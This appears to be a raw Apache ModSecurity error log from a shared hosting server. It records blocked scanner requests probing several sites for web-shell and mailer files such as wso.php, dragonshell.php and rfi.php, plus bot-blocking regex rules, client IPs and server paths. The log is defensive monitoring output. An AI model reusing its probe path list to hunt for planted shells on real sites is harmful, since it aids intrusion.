[Tue May 26 13:12:07.518085 2026] [security2:error] [pid 496740:tid 496964] [client 20.151.117.104:37146] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/maint/about.php"] [unique_id "ahVOz-vOeft4ltnLrH42pwAAAF4"]
[Tue May 26 13:12:07.630568 2026] [security2:error] [pid 496740:tid 496932] [client 70.140.129.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOz-vOeft4ltnLrH42jwAAAD4"]
[Tue May 26 13:12:07.665484 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:11983] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/\\\\.[a-z0-9]{4}\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "784"] [id "900080"] [msg "PHP Mailer Access Attempt"] [hostname "grandconclaveindia.org.in"] [uri "/.info.php"] [unique_id "ahVOz-vOeft4ltnLrH42rgAAAFQ"]
[Tue May 26 13:12:07.665583 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:11983] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "grandconclaveindia.org.in"] [uri "/.info.php"] [unique_id "ahVOz-vOeft4ltnLrH42rgAAAFQ"]
[Tue May 26 13:12:07.808402 2026] [security2:error] [pid 496740:tid 496967] [client 20.151.117.104:16159] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/albin.php"] [unique_id "ahVOz-vOeft4ltnLrH42tAAAAGE"]
[Tue May 26 13:12:07.808528 2026] [security2:error] [pid 496740:tid 496967] [client 20.151.117.104:16159] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/albin.php"] [unique_id "ahVOz-vOeft4ltnLrH42tAAAAGE"]
[Tue May 26 13:12:07.954333 2026] [security2:error] [pid 496740:tid 496886] [client 20.151.117.104:16137] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/dragonshell.php"] [unique_id "ahVOz-vOeft4ltnLrH42twAAABA"]
[Tue May 26 13:12:07.954480 2026] [security2:error] [pid 496740:tid 496886] [client 20.151.117.104:16137] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/dragonshell.php"] [unique_id "ahVOz-vOeft4ltnLrH42twAAABA"]
[Tue May 26 13:12:07.983359 2026] [security2:error] [pid 496740:tid 496990] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOz-vOeft4ltnLrH42qgAAAHg"]
[Tue May 26 13:12:08.097488 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:54414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/gifclass.php"] [unique_id "ahVO0OvOeft4ltnLrH42uwAAAG8"]
[Tue May 26 13:12:08.097593 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:54414] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/gifclass.php"] [unique_id "ahVO0OvOeft4ltnLrH42uwAAAG8"]
[Tue May 26 13:12:08.262708 2026] [security2:error] [pid 496740:tid 496942] [client 20.151.117.104:14290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/sql.php"] [unique_id "ahVO0OvOeft4ltnLrH42xAAAAEg"]
[Tue May 26 13:12:08.262807 2026] [security2:error] [pid 496740:tid 496942] [client 20.151.117.104:14290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/sql.php"] [unique_id "ahVO0OvOeft4ltnLrH42xAAAAEg"]
[Tue May 26 13:12:08.410330 2026] [security2:error] [pid 496740:tid 496962] [client 20.151.117.104:6681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/about.php"] [unique_id "ahVO0OvOeft4ltnLrH42zAAAAFw"]
[Tue May 26 13:12:08.410443 2026] [security2:error] [pid 496740:tid 496962] [client 20.151.117.104:6681] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/about.php"] [unique_id "ahVO0OvOeft4ltnLrH42zAAAAFw"]
[Tue May 26 13:12:08.546378 2026] [security2:error] [pid 496740:tid 496916] [client 185.191.171.9:31376] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-1st/day/2022-11-15/"] [unique_id "ahVO0OvOeft4ltnLrH420AAAAC4"]
[Tue May 26 13:12:08.546547 2026] [security2:error] [pid 496740:tid 496916] [client 185.191.171.9:31376] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-1st/day/2022-11-15/"] [unique_id "ahVO0OvOeft4ltnLrH420AAAAC4"]
[Tue May 26 13:12:08.555594 2026] [security2:error] [pid 496740:tid 496882] [client 20.151.117.104:27679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/function.php"] [unique_id "ahVO0OvOeft4ltnLrH420QAAAAw"]
[Tue May 26 13:12:08.555719 2026] [security2:error] [pid 496740:tid 496882] [client 20.151.117.104:27679] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/function.php"] [unique_id "ahVO0OvOeft4ltnLrH420QAAAAw"]
[Tue May 26 13:12:08.698385 2026] [security2:error] [pid 496740:tid 496941] [client 20.151.117.104:59265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/date.php"] [unique_id "ahVO0OvOeft4ltnLrH420gAAAEc"]
[Tue May 26 13:12:08.698505 2026] [security2:error] [pid 496740:tid 496941] [client 20.151.117.104:59265] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/date.php"] [unique_id "ahVO0OvOeft4ltnLrH420gAAAEc"]
[Tue May 26 13:12:08.841776 2026] [security2:error] [pid 496740:tid 496899] [client 20.151.117.104:51225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/pomo.php"] [unique_id "ahVO0OvOeft4ltnLrH422gAAAB0"]
[Tue May 26 13:12:08.841882 2026] [security2:error] [pid 496740:tid 496899] [client 20.151.117.104:51225] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/pomo.php"] [unique_id "ahVO0OvOeft4ltnLrH422gAAAB0"]
[Tue May 26 13:12:08.984895 2026] [security2:error] [pid 496740:tid 496913] [client 20.151.117.104:59270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/t/rfi.php"] [unique_id "ahVO0OvOeft4ltnLrH425AAAACs"]
[Tue May 26 13:12:08.984995 2026] [security2:error] [pid 496740:tid 496913] [client 20.151.117.104:59270] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/t/rfi.php"] [unique_id "ahVO0OvOeft4ltnLrH425AAAACs"]
[Tue May 26 13:12:09.222209 2026] [security2:error] [pid 496740:tid 496965] [client 20.151.117.104:5493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/sendmail.php"] [unique_id "ahVO0evOeft4ltnLrH426wAAAF8"]
[Tue May 26 13:12:09.222307 2026] [security2:error] [pid 496740:tid 496965] [client 20.151.117.104:5493] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/sendmail.php"] [unique_id "ahVO0evOeft4ltnLrH426wAAAF8"]
[Tue May 26 13:12:10.945401 2026] [security2:error] [pid 496740:tid 496984] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO0uvOeft4ltnLrH43IQAAAHI"]
[Tue May 26 13:12:13.443337 2026] [security2:error] [pid 496740:tid 496968] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO1evOeft4ltnLrH43eQAAAGI"]
[Tue May 26 13:12:14.759793 2026] [autoindex:error] [pid 496740:tid 496909] [client 217.79.118.143:52400] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:12:15.366851 2026] [security2:error] [pid 496740:tid 496978] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO1uvOeft4ltnLrH432wAAAGw"]
[Tue May 26 13:12:17.147316 2026] [security2:error] [pid 496740:tid 496838] [remote 85.128.143.146:60066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.143.128.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVO2OvOeft4ltnLrH44HAAADGE"]
[Tue May 26 13:12:17.934091 2026] [security2:error] [pid 496740:tid 496949] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVO2evOeft4ltnLrH44QwAAAE8"], referer: https://www.anujtradingco.com/
[Tue May 26 13:12:18.376498 2026] [security2:error] [pid 496740:tid 496901] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO2evOeft4ltnLrH44SQAAAB8"]
[Tue May 26 13:12:18.503780 2026] [security2:error] [pid 496740:tid 496885] [client 20.169.85.114:35170] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "162.222.227.191"] [uri "/cgi-sys/404.html"] [unique_id "ahVO2uvOeft4ltnLrH44XQAAAA8"]
[Tue May 26 13:12:18.688657 2026] [security2:error] [pid 496740:tid 496895] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVO2uvOeft4ltnLrH44ZgAAABk"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1287715&moderation-hash=91a889ac70362414dd8d3d7063359890
[Tue May 26 13:12:20.324006 2026] [security2:error] [pid 496740:tid 496983] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO2-vOeft4ltnLrH44lwAAAHE"]
[Tue May 26 13:12:21.132034 2026] [security2:error] [pid 496740:tid 496900] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVO3evOeft4ltnLrH44zQAAAB4"], referer: https://anujtradingco.com
[Tue May 26 13:12:22.246501 2026] [security2:error] [pid 496740:tid 496937] [client 185.191.171.10:41690] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahVO3uvOeft4ltnLrH45AwAAAEM"]
[Tue May 26 13:12:22.246703 2026] [security2:error] [pid 496740:tid 496937] [client 185.191.171.10:41690] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahVO3uvOeft4ltnLrH45AwAAAEM"]
[Tue May 26 13:12:22.720687 2026] [security2:error] [pid 496740:tid 496930] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO3uvOeft4ltnLrH45EgAAADw"]
[Tue May 26 13:12:22.743102 2026] [autoindex:error] [pid 496740:tid 496874] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 13:12:22.769204 2026] [security2:error] [pid 496740:tid 496908] [client 43.250.164.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVO3uvOeft4ltnLrH45KwAAACY"], referer: https://www.ucdc.co.in/
[Tue May 26 13:12:23.588255 2026] [security2:error] [pid 496740:tid 496924] [client 85.208.96.200:11402] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "anujtradingco.com"] [uri "/"] [unique_id "ahVO3-vOeft4ltnLrH45TAAAADY"]
[Tue May 26 13:12:23.588450 2026] [security2:error] [pid 496740:tid 496924] [client 85.208.96.200:11402] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "anujtradingco.com"] [uri "/"] [unique_id "ahVO3-vOeft4ltnLrH45TAAAADY"]
[Tue May 26 13:12:24.212827 2026] [security2:error] [pid 496740:tid 496812] [remote 57.141.2.39:28381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVO4OvOeft4ltnLrH45aAAAJkc"]
[Tue May 26 13:12:25.300488 2026] [security2:error] [pid 496740:tid 496881] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO4OvOeft4ltnLrH45kgAAAAs"]
[Tue May 26 13:12:27.237118 2026] [security2:error] [pid 496740:tid 496988] [client 43.173.132.100:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVO4-vOeft4ltnLrH458AAAAHY"]
[Tue May 26 13:12:27.602447 2026] [security2:error] [pid 496740:tid 496920] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO4-vOeft4ltnLrH457AAAADI"]
[Tue May 26 13:12:28.910546 2026] [security2:error] [pid 496740:tid 496978] [client 108.136.131.13:59509] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/.well-known/acme-challenge/inputs.php"] [unique_id "ahVO5OvOeft4ltnLrH46NQAAAGw"]
[Tue May 26 13:12:28.914830 2026] [security2:error] [pid 496740:tid 496881] [client 108.136.131.13:59608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/.well-known/acme-challenge/index.php"] [unique_id "ahVO5OvOeft4ltnLrH46OAAAAAs"]
[Tue May 26 13:12:28.945066 2026] [security2:error] [pid 496740:tid 496966] [client 108.136.131.13:59596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/.tmb/wso.php"] [unique_id "ahVO5OvOeft4ltnLrH46NgAAAGA"]
[Tue May 26 13:12:28.950090 2026] [security2:error] [pid 496740:tid 496931] [client 108.136.131.13:59506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/.well-known/acme-challenge/about.php"] [unique_id "ahVO5OvOeft4ltnLrH46OQAAAD0"]
[Tue May 26 13:12:29.246403 2026] [security2:error] [pid 496740:tid 496943] [client 108.136.131.13:59611] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/.well-known/acme-challenge/xmrlpc.php"] [unique_id "ahVO5evOeft4ltnLrH46TQAAAEk"]
[Tue May 26 13:12:29.463193 2026] [security2:error] [pid 496740:tid 496918] [client 108.136.131.13:60058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/.well-known/pki-validation/index.php"] [unique_id "ahVO5evOeft4ltnLrH46VwAAADA"]
[Tue May 26 13:12:29.471127 2026] [security2:error] [pid 496740:tid 496958] [client 108.136.131.13:60055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/.well-known/index.php"] [unique_id "ahVO5evOeft4ltnLrH46WgAAAFg"]
[Tue May 26 13:12:29.476949 2026] [security2:error] [pid 496740:tid 496914] [client 108.136.131.13:60045] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/.well-known/content.php"] [unique_id "ahVO5evOeft4ltnLrH46XgAAACw"]
[Tue May 26 13:12:29.477834 2026] [security2:error] [pid 496740:tid 496968] [client 108.136.131.13:60047] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/.well-known/gelay.php"] [unique_id "ahVO5evOeft4ltnLrH46XwAAAGI"]
[Tue May 26 13:12:29.907489 2026] [security2:error] [pid 496740:tid 496953] [client 108.136.131.13:60358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/0.php"] [unique_id "ahVO5evOeft4ltnLrH46cgAAAFM"]
[Tue May 26 13:12:29.912777 2026] [security2:error] [pid 496740:tid 496920] [client 108.136.131.13:60354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/.well-knownold/index.php"] [unique_id "ahVO5evOeft4ltnLrH46cwAAADI"]
[Tue May 26 13:12:29.914188 2026] [security2:error] [pid 496740:tid 496950] [client 108.136.131.13:60353] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/.well-known/wp-signup.php"] [unique_id "ahVO5evOeft4ltnLrH46dAAAAFA"]
[Tue May 26 13:12:29.915467 2026] [security2:error] [pid 496740:tid 496980] [client 108.136.131.13:60357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/.wp-cache.php"] [unique_id "ahVO5evOeft4ltnLrH46dQAAAG4"]
